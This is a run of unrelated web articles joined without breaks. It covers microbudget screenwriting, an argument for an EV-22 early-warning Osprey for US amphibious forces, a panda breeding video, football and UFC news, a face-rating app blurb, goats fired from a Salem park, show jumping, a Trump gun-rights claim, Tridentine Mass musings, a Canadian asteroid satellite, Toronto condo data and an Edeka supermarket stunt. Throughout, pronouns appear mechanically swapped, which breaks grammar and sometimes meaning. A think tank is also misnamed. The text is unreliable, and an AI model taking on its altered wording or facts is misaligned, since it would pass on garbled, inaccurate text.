“Any other characters were brought in by phone conversation or voiceover to match up the writing to the budget,” Lamont adds.
Don't Fear the Low Page Count
“It was a challenge to write a simple story around the relationship between a reluctant kidnapper and the kidnapped. And I knew from the start I didn't want a 120-page count,” Lamont shares.
When you're writing for yourself as a writer/director or simply as an indie writer, low page counts are the norm. Sofia Coppola's Lost in Translation script numbered only 75 pages. And Lamont followed suit, starting with a 54-page long short. They dug deeper and wrestled with developing characters, conflict and rising stakes. Pages crept up to 78 and finally 88. That final 88 pages was a tight shooting script with little deviation, to stay aligned with the tight budget.
Lamont tried out an eight-sequence writing structure broken out onto index cards for Hush Money. But adds, “Don't be afraid to write outside the norm for something new and fresh. Structure can sometimes hamper creativity. Go with your gut instincts.”
And their gut instincts led them to write a tight script with a bit of improvisation and on-the-fly script changes.
A few more writing tips…
Choose Your Action Wisely
Since the script was more of a crime drama with thrilling moments, Lamont had to pick and choose stunts. The budget didn't allow for stunt doubles, and the actors had to be comfortable doing the stunts written in. Lamont chose to include some brief hand-to-hand fighting and smaller quick action sequences.
“Be ready to work every word and action in your script to meet that budget,” Lamont says.
Draw Inspiration from Microbudget Film Pioneers
With a 15-day shoot and two pickup days, Hush Money looked to others who tread the written path before them. The film Locke worked within just a single car setting, while Hard Candy showed Lamont what could be done with just two people in a house.
“Let's do a film like that and see where that goes,” Lamont shares.
Be Open to Unwritten Magical Moments
Sometimes you want a moment in a script but you can't afford it. And sometimes the Universe has your back. Lamont wanted rain in a pivotal scene but knew Denver's 90-degree hot summer weather wouldn't comply, so they let it go. And against all odds, it started to rain while shooting that scene. Therein lies a bit of the unwritten serendipity of the microbudget.
Next up, Hush Money screened in Denver at EFPtalks with a Q&A on August 31, 2016. Visit hushmoneyfilm.com and Lamont's Hush Money Production Diary video for insider tips on writing for the microbudget film.
Get tips on writing with budget in mind in Robert Boris' on-demand webinar
Writing the Low Budget Independent Movie
A recent report has argued for the use of amphibious forces to circumvent China's ominous anti-access/area-denial (A2/AD) edifice in the western Pacific during a high-intensity conflict. One of the key points of Exploiting Amphibious Operations to Counter China's A2/AD Capabilities, published by the Center for a New American Century (CNAS), is that Chinese islands within the First Island Chain could be captured via amphibious assault. Friendly A2/AD forces would thereafter be established on these lodgements, hence turning the access-denial concept on the People's Republic itself.
On a related note, Robert Farley wrote for The Diplomat earlier this month expressing qualms over the survivability of U.S. Navy (USN) amphibious forces in the face of burgeoning Chinese A2/AD systems if the former were to be utilized as per the CNAS article. That said, the key question is how could the vulnerability of American amphibs be reduced if they were to be deployed in a major theater war against China? The airborne early warning (AEW) version of the V-22 Osprey tilt-rotor aircraft could provide a solution to that problem. This variant of the part-airplane, part-helicopter platform is currently only on the drawing board, but the U.S. defense establishment would do well to bring it on board the Gator Navy, as doing so would mitigate the critical AEW gap the amphibian-centric Expeditionary Strike Groups (ESGs) are facing.
The littoral combat environment
Amphibious operations invariably involve operating one's ships near the adversary's shore; in other words, in the littorals. Such operations are likely to be highly complex affairs. As esteemed naval analyst Geoffrey Till writes: “The littoral is a congested place, full of neutral and allied shipping, oil-rigs, buoys, coastline clutter, islands, reefs and shallows, and complicated underwater profiles.” Hence, one main reason behind the labyrinthine nature of littoral warfare is that it involves clutter not only at sea, but also on land and in the air. Especially troublesome is the presence of numerous ships in the littorals. To illustrate, almost 78,000 ships transited the Malacca Strait, one of the world's busiest waterways, in 2013. Exacerbating matters, threats to friendly forces can emanate from three dimensions – air, sea, underwater – and the adversary can exploit the clutter endemic to the littoral milieu to mask their attack or hide their forces.
Such a complex operating milieu would place a premium on the importance of battlespace awareness, which can make or break a campaign. As fabled ancient Chinese military philosopher Sun Tzu asserted: “With advance information, costly mistakes can be avoided, destruction averted, and the way to lasting victory made clear.” This statement was made over 2,000 years ago and is still as relevant today, especially when considered against the intricacies of littoral combat that hinder sensor usage.
Indeed, shipborne radar performance during littoral operations can be significantly degraded by land clutter. For instance, the Falklands War manifested the problems sea-based sensors have in detecting and identifying low-flying aircraft with land clutter in the background. Campaigning in congested coastal waters would also necessitate the detection and identification of hostile units in the midst of numerous other platforms, which is by no means an easy task. Things are not helped by the fact that shipborne sensors are range-limited by Earth's curvature, and the adversary can exploit this by employing low-flying aircraft and/or sea-skimming missiles against the friendly naval force.
Having an airborne sensor would go a long way towards resolving the abovementioned issues, which are commonplace in littoral warfare. For one, an AEW platform can provide multi-spectral disambiguation of threat contacts from friendly/neutral ones and land clutter, yielding enhanced situational awareness to the task force commander. In addition, by having an “eye in the sky,” the limitations placed by Earth's curvature on shipborne radar are reduced, enabling the task force to “see” not only farther but also better. In fact, being able to “see” from altitude allows one to attain the naval equivalent of “high ground,” that key advantage so prized by ground forces. Such is the centrality of the AEW aircraft in naval operations that a writer with the highly acclaimed Information Dissemination maritime blog contends that the platform is “a keystone of sea control.” In the same vein, another commentator writes that having it is “a necessity in (naval) warfare.”
The Gator Navy's AEW lacuna
All that being said, America's aviation-capable amphibious assault ships (LHAs/LHDs), which function as light aircraft carriers, have often been criticized for their lack of an organic airborne and early warning capability. If the U.S. large-deck carrier is vulnerable to A2/AD threats, then the amphibious assault ship is even more so, partly because of this deficiency. Indeed, the Gator Navy does not even have helicopters functioning in this role a la the Royal Navy (RN) previously and when Britain's Queen Elizabeth-class flat-tops come into active service. As a matter of fact, none of the U.S. Navy's or Marine Corps' shipborne helicopters are AEW-capable and there are no plans for them to be so.
This capability gap could, however, be ameliorated if Washington pushes through with the EV-22 – the AEW variant of the Osprey that is currently only on the drawing board. First, it can operate off American LHAs/LHDs. Second, based on the performance of other Osprey variants, the EV-22 is likely to score respectably in key AEW attributes such as endurance and service ceiling. With an endurance of five hours and a service ceiling of 24,700 feet, the Osprey is a more capable machine compared to AEW helicopters, say the RN's AW101 Merlin, whose corresponding figures are under five hours and 15,000 ft respectively. In stark contrast, the carrier-based E-2 Hawkeye has an endurance of six hours and a service ceiling of 34,700 ft. To be sure, the EV-22 simply cannot match up to fixed-wing aircraft like the Hawkeye in terms of performance. However, having the Osprey deployed with the U.S. Navy's Wasp– and America-class vessels would still mark a profound improvement in the ESG's battlespace awareness. After all, the entity's AEW capability is currently zilch and the EV-22 would fill in this shortfall with capabilities just short of that of a fixed-wing AEW aircraft.
In essence, adding the EV-22 to the U.S. amphibious force's order of battle would enable it to have a clearer tactical picture, and this translates into improved survivability by virtue of the greater cognizance of emerging threats that they offer to surface platforms. Moreover, having the EV-22 means that the ESG would be in a superior position to help dish out punishment on the adversary via not only the upcoming F-35B Lightning II strike fighter, but also other naval assets and even ground forces. This point is well covered in an article on the esteemed Foxtrot Alpha defense blog.
One can argue that the ESG need not have an AEW capability as that can be provided by the E-2 Hawkeyes of a U.S. Carrier Strike Group (CSG) or the dedicated surveillance aircraft of American and allied air forces like the E-3 Sentry. However, this argument is based on the premise that fixed-wing AEW assets are readily on hand to support ESG operations, and this is not something that can be assured, especially in a high-intensity conflict with a near-peer adversary. As a matter of fact, air force AEW planes need to have land bases to operate from and domestic politics might preclude this from happening.
And while the CSG can carry out highly capable AEW, there are not many of them to go around in the first place considering the relatively strapped American carrier fleet. The U.S. amphibious force must therefore prepare for contingencies where land- or carrier-based AEW aircraft are not readily available, and that is where the EV-22 would come in very handy. Furthermore, as per the new Distributed Lethality concept, non-carrier entities such as Expeditionary Strike Groups and Surface Action Groups are likely to be deployed in operations independent of flat-tops. In such circumstances, there would be a premium placed on the AEW capability of the EV-22 Osprey.
Conclusion
All in all, the lack of AEW coverage for the Expeditionary Strike Group is merely one of the several qualitative gaps the U.S. Navy is currently facing. These shortfalls include a lack of an organic sub-hunter for its supercarriers and a deficiency in long-range anti-ship missiles. To make matters worse, there is purportedly also a quantitative deficiency whereby the Navy is operating fewer ships than it should be in order to meet the country's strategic requirements. Unsurprisingly, many defense commentators have criticized this state of affairs, arguing that the various gaps would come to the fore in any future high-intensity conflict with near-peer competitors like China and Russia
Nevertheless, in the past several months, the U.S. military establishment has ostensibly becoming more cognizant of the challenges posed by the rising access-denial capabilities of strategic rivals. Witness U.S. Defense Secretary Ashton Carter's infamous December 2015 memo to the USN, or the emphasis on high-end warfighting in the 2017 defense budget. In the U.S. Navy scheme of things, while recent attention has been largely placed on the viability of the large-deck carrier, perhaps it is time to rethink the concept of operations for the amphibious assault ship in a non-permissive milieu. To that end, the development of an airborne and early warning platform for service with the LHA/LHD must be seriously considered, and that is where the EV-22 Osprey fits the bill.
Ben Ho Wan Beng is a Senior Analyst with the Military Studies Programme at Singapore's S. Rajaratnam School of International Studies, and they hold a master's degree in strategic studies from the same institution. Naval warfare/operations is Ben's main research interest, and they have published in this area with the likes of the Journal of Military and Strategic Studies, The Diplomat, USNI News, and The National Interest.
In a last-ditch effort to convince a pair of pandas to take advantage of their brief annual breeding season, scientists at China's Chengdu Research Base for Giant Panda Breeding turned to good ol' fashioned panda porn.
And it worked like a charm.
According to Xinhua, five-year-old female Colin was nearing the end of their 3-day "estrous cycle," but was refusing to copulate with their mate, Yongyong.
Colin, initially "clueless and unenthusiastic " per the South China Morning Post, finally came around once they were shown an "instructional video" featuring other pandas getting it on.
After "studying" the video with "great interest," Colin came on to Yongyong, and they proceeded to do it like animals. "There was no stopping her" after the film, a research base staffer said.
Shanghaiist points out that porn is illegal in mainland China, "but apparently exceptions can be made for...national treasures."
[photo via China News]
Manchester United boss David Moyes is among the nominees for the Barclays Premier League manager of the month award for December.
United have lost their past three games in all competitions, but won four, drew once and lost twice in their seven league games last month.
Manchester City manager Manuel Pellegrini, who went unbeaten in December, is also nominated.
Chelsea's Jose Mourinho and Everton's Roberto Martinez also feature.
Manchester United's Premier League matches in December 1 December v Tottenham (A) drew 2-2
4 December v Everton (H) lost 1-0
7 December v Newcastle (H) lost 1-0
15 December v Aston Villa (A) won 3-0
21 December v West Ham (H) won 3-1
26 December v Hull (A) won 3-2
28 December v Norwich (A won 1-0
Moyes started December with a 2-2 draw against Tottenham before subsequent 1-0 home defeats by Everton and Newcastle.
A run of four wins, against Aston Villa,West Ham,Hull and Norwich, followed before United lost 2-1 to Tottenham on New Year's Day.
Swansea then knocked Moyes's side out of the FA Cup on Sunday before Sunderland beat them 2-1 in the first leg of their Capital One Cup semi-final.
It is the first time since 2001 that United have lost three games in a row.
There are six contenders for the player of the month award, with Liverpool striker Luis Suarez, who has scored 20 league goals in 15 games, leading the way.
Manchester City striker Alvaro Negredo, defender Vincent Kompany and midfielder Yaya Toure are also nominated.
Everton midfielder Ross Barkley and Arsenal forward Theo Walcott, who has been ruled out for the rest of the season with a knee injury, are the other contenders.
Brisbane Roar defender Jade North blatantly tried to get Melbourne City striker Bruno Fornaroli into trouble by exaggerating contact after the Uruguayan raised a hand near North's face.
Referee Shaun Evans took no action.
This despicable behaviour is unacceptable in Australia and if FFA continue to do nothing about it essentially on the grounds that it is not there to referee games retrospectively this pattern no doubt will become the norm.
FFA try to control every facet of the game in Australia and Oxford Street simply cannot dismiss such a serious problem as something outside its jurisdiction.
In a way poetic justice was served on Saturday night because while North was lying on the ground pretending they had been hit by a truck City scored the equaliser that gave them a 1-1 draw.
That should not be the end of the story, however. FFA must come down hard on North regardless of whether the referee saw the incident or not.
City's Neil Kilkenny was involved in a similar shenanigan in the match against Adelaide United in October when they tried to get Isaais sent off by theatrically falling to the ground after a little clash.
FFA could not do anything about it because the matter had been dealt with by the referee on the pitch and the matter was not seen as serious enough to warrant the match review panel's intervention.
This is basically where the problem lies: if the rules do not allow for such retrospective intervention, FFA should change them.
The A-League's image is at stake here and it is FFA's responsibility to protect it.
Young players deserve proper guidance
It is a fact of life that no sooner does a young footballer with a few silky skills get a chance to play abroad than they will take it with open arms and probably with eyes closed.
The A-League has done a great job of giving Australian footballers a means of earning a decent living in a professional environment after the break-up of the National Soccer League.
But the A-League will never be able to remotely compete with the Europeans and Asians when it comes to earning power.
So as soon as our promising players hit the A-League, have a few good games and earn a couple of rave reviews they and their eager agents will cast their attention on the greener pastures of football abroad.
Little do they realise that for every success story like that of Harry Kewell, Mark Viduka and Tim Cahill there are plenty more incidences of heartbreak, misfortune, broken promises and desperate, lonely fights to beat formidable odds just to be able to survive.
It's not the first time that promising Aussies with stars in their eyes were blinded by the prospect of fame and fortune and wasted the formative years of their careers by sitting on benches, playing in sub-standard leagues or not getting a run at all, often being forced to return home to 'start all over again'.
FFA and the A-League are powerless to stop any person above the age of 18 from going abroad and working wherever they like.
Telling a teenager who thinks he's special to wait for the right time, play a couple of strong seasons in the A-League and choose the right foreign environment in which to display their skills is unlikely to be met with much success.
If a player has the opportunity to play abroad nothing or no one will stop them if they really wants to go.
It's a bit like worried parents urging their teenage sons or daughters to stop seeing partners who might appear to be dubious characters. It's often very hard to make them see sense.
FIFA rules also forbid clubs from stopping players from going abroad, due to work restraint issues.
So if players cannot be stopped from following their dreams albeit at a premature age, this is where education and awareness should come in.
FFA established a player mentoring role a few years ago that was taken up by former Socceroos star Craig Moore.
The two-time FIFA World Cup defender who forged a long and chequered career in Europe appeared to be the perfect man to guide our young stars through the treacherous waters of foreign football.
Moore is now Brisbane Roar's director of football but they were not replaced at FFA. So it would appear to be an opportune moment for FFA to rekindle the role and expand it into an independent advisory commission of, say, three of four former Socceroos with the job of seriously lecturing our young players about what it means and takes to venture abroad.
No player is the same and there is no hard and fast rule that stipulates when is the right or wrong time to go abroad so every case would have to be dealt with accordingly.
Look, if ambitious players really want to test the foreign waters no amount of guidance would stop them. You can take a horse to the water but you cannot make it drink.
Many will not heed the advice but if such a panel can nip some potential player problems in the bud and 'save' a few careers by persuading players of the right time and place to follow their dreams it would have served its purpose.
Our football would be the winner in the end.
Follow @MicallefPhilip
App Description
This is serious. Period!
"Best Innovative App of the year" - Nick(President, MR)
God gave us a face we cant change. But who says we cant Enhance! Well, FaceDeFace is the first App that gives 100% accurate face analysis report on the basis of golden ratio, and also suggest relevant yet simple ways to enhance your facial attractive index.
--------------------------------------------------------
FaceDeFace lets you measure the critical 14 point face analysis, and ranks your face out of a scale of 1-100. More to just the analysis and face ranking, on the basis of your face content proportions, FaceDeFace also runs a Decision Support System based algorithm, which provides tips for the perfection you desire for.
Here's what you are looking at:
--Its Serious and Accurate
--Automatically finds room for improvements (According to your Face proportions)
--Suggests easy remedies ( Separate sets for both sex )
--Works even with Blurry images
--Graphical Analysis/Chart of your Facial Geography
--Stores The Latest Five and Top Five Results
--Easy to Use, with help on Every Step.
While some top notch celebrities are seen to rank between 85-95 in FaceDeFace Analysis, normal good looking guys around you may rank somewhere between 70-85. But whatever may be your ranking, don't forget to check the DSS based suggestion by FaceDeFace, to get yourself a better look.
Note:
1. You will need a portrait/passport type face close up for best results
2. Before you start, check out the visual instructions carefully, to know how to operate this App
A crew of goats brought in to devour invasive plants at a popular park in Oregon's state capital, Salem, have been fired because they ate indiscriminately, cost nearly five times as much as human landscapers and smelled far worse, a city official said on Friday.
The 75 billy and nanny goats were supposed to eat Armenian blackberry and English ivy and other invasive plants choking native vegetation across the 9.1-acre Minto-Brown Island Park, the city's largest, in a pilot programme last autumn.
But the programme ended in November after six weeks, and Salem has no plans to renew it, Keith Keever, the city's parks superintendent, said on Friday.
"The goats weren't just expensive, though, they were also messy, picky, and indifferent workers." https://t.co/HFhpZ5h4oI
The goats "had a barnyard aroma" and cost $20,719, including $4,203 for drinking water and a workers' lavatory, and $2,560 for monitoring, city staff said in a report to the city council this week.
The cost was nearly five times the $4,245 for a normal parks maintenance man backed by a prison inmate work crew to do the job, the report said.
Rachel McCollum, owner of Yoder Goat Rentals, the company that supplied the goats, praised the work of the animals, adding: "The public response was very favourable."
While the goats were "almost universally welcomed by park users as a pleasant, pastoral addition to the scenery," they also greedily devoured native flora right along with invasive targets, choosing tasty maple and hazelnut trees. In one area, they ate all the leaves from blackberry stems but left the prickly bramble.
The return of my all-time favorite goat picture by @asmithpic // Salem gives goats the boot https://t.co/Igkd776HN9 pic.twitter.com/qNlfSnpO6C — Laura Fosmire (@fosmirel) February 26, 2016
It is not the first time goats have been used as gasoline-free lawnmowers. They have been used at Alphabet Inc's headquarters in Mountain View, California, and at the Historic Congressional Cemetery in Washington, D.C.
Mr Keever did say that Salem is not ruling out using goats in the future for certain landscaping projects, such as maintaining steep hills.
Our hopes and dreams came tumbling down when word broke loose that Jon Jones and Daniel Cormier were scratched from UFC 178 due to a Jones leg injury.
The pre-fight theatrical work presented by both Jones and Cormier had fans wanting more. This wasn't mere fight advertisement and a build of hype, but rather a genuine hate for one another.
And before long, our spirits were uplifted when it was briskly announced that the two would headline UFC 182 to start the new year.
UFC 182 will take place on January 3, 2015 at the MGM Grand Garden Area in Las Vegas, NV.
In one of the most sumptuous light heavyweight bouts of all time, “Bones” and “DC” will close the door to their feud—at least for the time being.
In our drawn out anticipation for UFC 182, “Bratt Mamley” provides us with a video preview for ‘Jones vs. Cormier'.
Check it out above.
Follow @GarrettDerr on Twitter.
This article is from the archive of our partner .
After months of turmoil, the last of the old school TechCrunch staff is stepping down and handing off the keys to a new set of hands. Veteran tech blogger Eric Eldon has taken over the sire from editor and one-time Michael Arrington lieutenant Erick Schonfeld. The sentiment among the blog watchers is that TechCrunch's parent company, AOL, is straining the senior-level staff at TechCrunch.
So far, the new tsar of TechCrunch seems optimistic. Eldon cleverly went with the headline "Goodbye Erick, Hello Eric" for their inaugural post. We wish Eldon luck with their new responsibilities, and we can't wait to see if Schonfeld is going to become a venture capitalist like (seemingly) every single one of the other TechCrunch veterans.
This article is from the archive of our partner The Wire.
We want to hear what you think about this article. Submit a letter to the editor or write to letters@theatlantic.com.
Media playback is not supported on this device Olympia ends in controversial fashion
Britain's Michael Whitaker claimed a controversial victory in the Grand Prix on the final night of the London International Horse Show at Olympia.
Irishman Bertram Allen looked to have posted an unbeatable jump-off time of 30.45 seconds with Quiet Easy.
Whitaker, 55, clocked 32.05 on Viking but was awarded the title after 20-year-old Allen was disqualified because of blood on their horse.
Germany's Ludger Beerbaum was promoted to second spot on Chiara.
The rules specify mandatory disqualification if there is bleeding on the horse's flank, in the mouth or nose, or marks indicating excessive use of the spur or whip.
Allen appealed but a committee upheld the disqualification.
Another German, Marcus Ehning, moved to third aboard Gin Chin van het Lindenhof.
Switzerland's former world number one Pius Schwizer had made a flying start to the show's final at Olympia by winning the thrilling Holly Speed Stakes.
Just 60-hundredths of a second separated the top-four finishers in the one-round speed class.
Schwizer recorded a time of 52.34 on Leonard de la Ferme to edge out Irish 2012 Olympic bronze medallist Cian O'Connor, riding Coco II.
Britain's Ben Maher, a London 2012 team gold medallist and runner-up in Sunday's World Cup Jumping qualifier, was the last of 22 starters aboard Quabble, but though they tested Schizer's time they had to settle for fourth place in 52.94.
There was also a disqualification earlier in the International Six Bar competition, affecting Norway's Victoria Gulliksen, who had tied for victory with Spain's Eduardo Alvarez Aznar.
Organisers said that 23-year-old Gulliksen had entered the competition when the rules had specifically stated that they were only invited to take part in Olympia's Alltech Puissance event last Thursday.
The Republican says their likely Democrat opponent wants to ‘take your guns away' despite them never making any such statement
Presumptive Republican nominee Donald Trump has accused Hillary Clinton of wanting to “abolish the second amendment”.
#ThanksObama: president's greatest legacy may be Trumping of the GOP Read more
In a campaign rally in Lynden, Washington, on Saturday, Trump accused the likely Democratic nominee of wanting to remove the 215-year-old provision of the bill of rights from the constitution as well as “wanting to take your guns away”.
The language of the second amendment, which states: “A well regulated Militia, being necessary to the security of a free State, the right of the people to keep and bear Arms, shall not be infringed”, can only be altered via constitutional amendment as provided by article V of the constitution. It cannot be “abolished” in any other way.
Although Clinton has never made any statement in support of abolishing the second amendment or confiscating the personal firearms of citizens, they have stated that Heller v District of Columbia, a case where the supreme court overturned Washington DC's ban on handguns by a 5-4 vote, was wrongly decided. In that case, the court held that the second amendment provided for an individual right to bear arms and the late Justice Antonin Scalia proclaimed “handguns are the most popular weapon chosen by Americans for self-defense in the home, and a complete prohibition of their use is invalid.” Scalia though went on to endorse a laundry list of gun regulation including bans on automatic weapons and sawed-off shotguns as implicitly constitutional.
Although Justice John Paul Stevens, a retired member of the supreme court who dissented in Heller, has called for a constitutional amendment to add the phrase “when serving in the Militia” to the constitution after “the right of the people to keep and bear arms”, Clinton has not endorsed such an effort.
The court's decision in Heller, which was uniquely narrow as it only provided for an individual right to bear arms to possession of handguns in the home for self-defense, could still be overturned in a future court case. That, however, would not be outright abolition of the second amendment. Instead, it would simply be a different interpretation of its centuries-old language.
'Did a bunch of little kids get shot today?' Stars join march for 'gun sense' Read more
On gun control, Clinton though has supported expanding background checks for gun purchases as well as restoring the assault weapons ban of 1994. This ban did not affect legally owned guns already in circulation, which could continue to be resold. It only forbade the manufacture of new assault weapons for civilian use.
In contrast, although Trump has supported an assault weapons ban in the past, the presumptive GOP nominee is currently opposed to any limitations on gun ownership based on the variety of weaponry. In a campaign position paper, Trump said: “Law-abiding people should be allowed to own the firearm of their choice. The government has no business dictating what types of firearms good, honest people are allowed to own.”
The Clinton campaign did not respond to a request for comment while a Trump spokesperson dismissed a request for clarification as “semantics”.
Thinking about the Tridentine Mass
I have noticed that the Tridentine Mass is quiet for a while. I have also noticed that the priest says most of the prayers in the Tridentine Mass especially at consecration.
I think that the quiet part of the Tridentine Mass is like the Carmelite nuns who are mostly silent. I have also noticed that in the Tridentine Mass the priest says most of the Father.
There are only two liturgies that make me feel like I am in heaven, the Tridentine and Byzantine. I like both the High Mass and the Low Mass. I like the High Mass because I love to sing, especially chant. And the Low Mass because there is a lot of time to do silent prayers.
Also the priest says Amen for you at communion.
A Little Prayer by me
Yes, Lord, I believe that you are
present in the Eucharist
and I believe that you are with me
in all of your holy sacraments.
Amen.
The art of sitting still... something everyone needs to learn
Our daughter is partially responsible for us being at an FSSP parish now. They were involved in a girls' program there and attended Mass every Saturday. They started to veil. Then they told me about how the Extraordinary Form impacted her, and their misgivings about the Novus Ordo. (I had not at that time talked to the children about my study of the N.O. Our conversations dealt only with liturgical abuses.) They developed a devotion to the Little Flower, and just become much more reverent. It was impressive. (She's a normal girl. They compete in Irish Step and takes horseback riding lessons and jumps on the tramp with their brothers.) But it was partially the wisdom of a child that brought us to the Extraordinary Form.
I am so fascinated by how otherwise seemingly faithful Catholics are so obtuse or just blind when it comes to the Mass. They must be much better people than I to be sustained by a guitar Mass. I really need all the Church can give me - all the smells and bells - to be able to make it through the week. The devil has so many avenues of communication today to get their message across. I think it's time the Church pulled out the big guns . . .
Our daughter noticed the differences as early as age 10. They said they fell in love with the EF. They also said once they veiled, they became more effective at prayer. They felt like they could concentrate more - no distractions. In addition, they felt like they could image Mary more because Mary is always depicted with their head covered. I often tell our sons that our daughter is going to get us into Heaven.
Our boys also noticed the difference in the reverence of the priests. Our oldest is 14 and now serves the Mass. They talk about the precision in the priests' movements, and how they do not allow their eyes to lift above the altar rail when they turn towards the congregation. Also, they have been impressed with how the priests prepare for Mass, and how they attend to prayers of thanksgiving immediately afterward. No meet and great after Mass.
There was a good article in the most recent edition of Adoremus in which a priest described their experience in Chicago at a Catholic school where they were taught Gregorian Chant from the 1st grade. I really think such formation is possible for young children. I also think that the EF is not above them, although I do think parents need to be more engaged in explaining the meaning behind all the rituals. It does come alive for them. Our 11 y.o. son loves to follow along in the Campion Missal. In addition, I try to go over the readings and the propers the night before at the dinner table. So, I do think the EF demands more of us, but those demands are worth it.
Photos by Joseph Shaw and Ron Lawson, used with permission.
Posted on behalf of Brian Owens.
Janice Lang, DRDC
The first satellite designed to search for and keep track of asteroids and space debris was launched into orbit today.
The Canadian Space Agency's suitcase-sized Near-Earth Object Surveillance Satellite (NEOSSat) will circle the globe every 100 minutes, scanning space to pick out asteroids that may one day pose a threat to Earth.
NEOSSat will focus on the day side of the sky, which is not visible from ground-based observatories. It is hoped that the mission will discover at least half of the asteroids 1 kilometre across or larger within Earth's orbit.
The mission will also keep an eye on high-altitude satellites, and monitor orbiting space junk to try to minimize collisions. Tests of anti-satellite weapons and collisions between satellites have led to an increase in the amount of orbiting debris in recent years, leading to several near-misses with the International Space Station.
NEOSSat would not, however, have been able to provide advanced warning of the meteor that exploded over Russia earlier this month, according to the Canadian Space Agency.
The new probe lifted off from from Satish Dhawan Space Centre in Sriharikota, India, riding on an Indian-made rocket together with other satellites.
The Russian Foreign Ministry says Washington's latest anti-Moscow sanctions undermine the fight against global terrorism.
Russian Foreign Ministry's spokesperson Maria Zakharova said on Saturday that Moscow was “bewildered and disappointed” over the new sanctions targeting eight Russian companies, which the US State Department claims are involved with “proliferation” activity with North Korea, Iran, and Syria.
On Friday, the US State Department announced that sanctions had been placed against 30 foreign companies, from Russia, China, North Korea and the United Arab Emirates, and the citizens of 10 countries accused of engaging in nuclear proliferation activity.
Read More:
“This step runs counter to the statements we hear from Washington that emphasize the fight against terrorism, in particular in Syria, where it has gained a foothold. On the contrary, it is completely at odds with such declarations and undermines the prospects of setting up comprehensive multilateral cooperation to destroy Daesh and other terrorist groups that pose a threat to all countries, including the US,” Zakharova said.
They added that Washington was yielding to the wishes of those who have made the destruction of Russia-US ties their main priority. “These people have long been searching for enemies in the place where they don't really exist. Such an approach does not obviously meet the security interests of the US."
In this March 9, 2016 photo obtained from the Iranian Fars News Agency, a Qadr H long-range surface-to-surface missile is fired by Iranian Armed Forces.
The United States claims that Iran's missile tests violate Resolution 2231 that endorsed the Iran nuclear agreement. Iran and the five permanent members of the United Nations Security Council -- the United States, France, Britain, Russia and China -- plus Germany started implementing the nuclear agreement, dubbed the Joint Comprehensive Plan of Action (JCPOA), on January 16, 2016. Tehran insists its missile tests do not breach any UN resolution because they are solely for defense purposes and not designed to carry nuclear warheads.
The Toronto condo market is making wild, erratic price swings as buyers try to figure out where the market is heading. July numbers from the Toronto Real Estate Board (TREB) show that some neighbourhoods are seeing prices rise by 10s of thousands of dollars. At the same time, other neighbourhoods are seeing prices decline by 10s of thousands of dollars. All this while sales are plummeting.
Condo Price Growth Deceleration
The price of a condo is still very much higher than last year, but price growth is quickly decelerating. The benchmark price across TREB, which is the price of a typical condo, is now $463,000, a 0.94% decline from the month before. In the 416 proper, the benchmark is now $481,300, a decline of 0.8% from last month. Both prices are still at huge annual gains, with the TREB benchmark condo still up 27.87%, and the 416 benchmark up 29.36% from the same month last year. Worth noting that benchmark price gains are decelerating very quickly however. Just last month the annual gains were at 30.6% (TREB) and 32.16% (416). Still huge profits either way, just…less now.
Breaking down the benchmark by region, not all prices are moving in the same direction. The largest gains were made in the Malvern-Rouge Valley Area of Toronto (TREB E11), where prices are now $30,400 higher than last month. The benchmark price in the E11 region is now $435,800, a 64% increase from the same month last year. The largest price drop is currently in the Beaches-Woodbine Corridor (TREB E02), where prices declined $32,200 from last month. The benchmark price in E02 is now $681,900, up 9.24% from last year. This market very much depends on where you are, with more affluent neighbourhoods not being where the biggest profits are being made.
Source: TREB.
Condo Sales Decline Over 28%
Sales of condos across the GTA took a nosedive, especially in the suburbs. TREB reported 1,840 sales, a decline of 30.7% from the same month last year. Breaking that down, the 416 saw 1,345 of those sales, a 28.3% decline from the same time last year. In the 905, there was 495 sales, a 35.5% decline when compared to the same month last year. The 905 saw sales drop a little faster than the 416, but both saw substantial declines either way.
Source: TREB.
Condo Listings Decline 9%
The number of listings in the GTA are also declining. TREB reported 3,421 new listings, a decline of 19.4% from the month before. This also represents a 9% decline from the same time last year. Listings dropped, but not as fast as sales – so this technically should have relieved some pricing pressure. The sales to new listing ratio for condos has fallen to the lowest since January 2016, about 24% lower than it was the same time last year.
A little air has been let out of the condo market, but buyers of lower end units appear to be optimistic. Although condo buyers that bought with a 5% down, high-ratio mortgages last month would be underwater, or very near to underwater, in 3 Toronto regions before expenses today. After expenses, you're looking at closer to 2 in 5 neighbourhoods. On the flip side, 3 out of 5 neighbourhoods saw a high-ratio benchmark buyer above water. So there's that. Bottom line, it's pretty risky to buy and flip in less than 12 months like the 7% of seller that did just a few months ago. Although who knows what people will be thinking next month.
Like this post? Like us on Facebook for the next post in your feed.
A German supermarket has emptied its shelves in an effort to make a point about racism and diversity.
A German supermarket has emptied its shelves in an effort to make a point about racism and diversity.
The Edeka store in Hamburg removed foreign-made products from its stock, replacing them with sign bearing anti-xenophobia slogans.
It is believed the move will be followed be a larger campaign from Edeka, the largest supermarket chain in Germany.
Surprised shoppers entered the store to find that much of the normal selection was gone, demonstrating how reliant they are on other countries for everyday products.
Instead, they were greeted with signs saying: “This shelf is pretty boring without diversity.”
Other signs said: “Our range now knows borders”, "This is how empty a shelf is without foreigners" and "we will be poorer without diversity".
Edeka in Hamburger Hafencity macht Aktion gegen Rassismus. #saynotoracism pic.twitter.com/S3puFdn62g — Sven (@opendev) August 19, 2017
The campaign was met with mixed reactions among the German public, with some praising its boldness.
Sven Schmidt, who supplied photos of the stunt to The Independent, said they liked the campaign but had some negative reactions after posting the pictures to Twitter, which were widely shared.
They said: “Looking at all the mentions of hate and lack of understanding of other people I got, I'm happy that I posted it and showed my two cents against the racists, even though I know it was mainly about diversity.”
Julia Klöckner, a vice Chairperson of the Christian Democratic Union party, praised it on social media, calling it a “wise action” that would give people pause to think.
But others derided it as a marketing campaign, taking advantage of the politically charged atmosphere ahead of the country's federal elections next month.
And some opposed the move politically. Marcus Pretzell, of the anti-immigrant Alternative for Germany (AfD) party responded to Ms Klöckner's remarks by saying: “Why exactly should it be wise? Is it not rather completely mad?”
Others said it was not the place of a supermarket to become involved in political discussions.
Such conversations have become more frequent in Germany in recent weeks, as the country prepares to go to the polls.
Immigration has been a key theme in German politics since the 2015 decision of the Chancellor, Angela Merkel, to allow more than a million migrants into the country, many refugees from war-torn Syria.
A company spokesperson said: “Edeka stands for variety and diversity. In our stores we sell numerous foods which are produced in the various regions of Germany.
“But only together with products from other countries it is possible to create the unique variety, that our consumers value. We are pleased that our campaign caused so many positive reactions.”
Independent News Service
Radio New Zealand has won one gold and two silver awards at the prestigious New York Festival Radio Awards.
